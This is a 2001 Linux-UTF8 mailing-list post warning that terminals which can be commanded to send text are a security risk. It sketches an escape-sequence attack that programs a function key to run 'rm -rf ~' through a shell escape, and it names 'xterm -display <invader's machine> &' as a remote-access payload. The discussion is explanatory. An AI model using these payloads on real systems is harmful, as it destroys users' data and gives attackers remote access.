At 09:06 15/03/2001 +0200, Kai Henningsen wrote:
> > Careful. Those who don't remember history are doomed to repeat it.
> > There is no bigger security risk than being able to command a terminal to
> > send its screen contents, or portions of it. 30 years ago it was called
> > the "Berkeley bug".
>
>Well, then one would have to analyze what made it problematic, because I
>certainly think of that as an essential feature. General unavailability of
>that makes for a *very* noticably less friendly environment, IMO.
This security risk applies to anything where the host can command the
terminal to send a text string.
Consider the case of a text file containing the escape sequences to:
- Program the PF1 key to send <Email program's Shell escape>rm -rf ~<CR>
- Trigger the PF1 key
Replace "rm -rf" with what you think will hurt you - "xterm -display
<invader's machine> &" is another "nice" payload on Unix (this was used in
an exploit one of the more widespread DNS server security holes).
Variants of this have been exploited through the "write" command, email,
NetNews and other programs.
--
Harald Tveit Alvestrand, [EMAIL PROTECTED]
+47 41 44 29 94
Personal email: [EMAIL PROTECTED]
-
Linux-UTF8: i18n of Linux on all levels
Archive: http://mail.nl.linux.org/lists/
